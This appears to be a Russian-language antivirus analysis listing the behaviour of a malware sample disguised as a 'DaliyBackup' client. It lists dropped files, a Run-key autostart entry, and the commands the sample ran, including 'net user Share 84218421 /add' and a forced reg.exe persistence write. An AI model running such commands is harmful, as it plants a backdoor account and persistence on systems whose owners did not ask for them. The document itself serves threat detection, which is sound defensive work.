Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Setup' = '%WINDIR%\DaliyBackup\BkpClient.exe' (параметр автозапуска: BkpClient.exe запускается при каждом входе текущего пользователя в систему)
- %TEMP%\29120O88.bat
- %TEMP%\2988SORA.bat
- %WINDIR%\DaliyBackup\BkpClient.exe
- %WINDIR%\DaliyBackup\Start.exe
- %TEMP%\2988SORA.bat
- %TEMP%\29120O88.bat
- %TEMP%\29120O88.bat
- ClassName: 'EDIT' WindowName: ''
- '%WINDIR%\DaliyBackup\BkpClient.exe'
- '%WINDIR%\DaliyBackup\Start.exe'
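- '<SYSTEM32>\net.exe' user Share 84218421 /add (создаёт локальную учётную запись «Share» с паролем «84218421»)
- '<SYSTEM32>\net1.exe' user Share 84218421 /add (та же команда, выполняемая через net1.exe)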
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\2988SORA.bat" %WINDIR%\DaliyBackup\BkpClient.exe "
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\29120O88.bat" "%WINDIR%\DaliyBackup\Start.exe" "
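- '<SYSTEM32>\reg.exe' ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Setup /t REG_SZ /d "%WINDIR%\DaliyBackup\BkpClient.exe" /f (записывает параметр автозапуска 'Setup' в раздел Run; ключ /f перезаписывает существующее значение без запроса подтверждения)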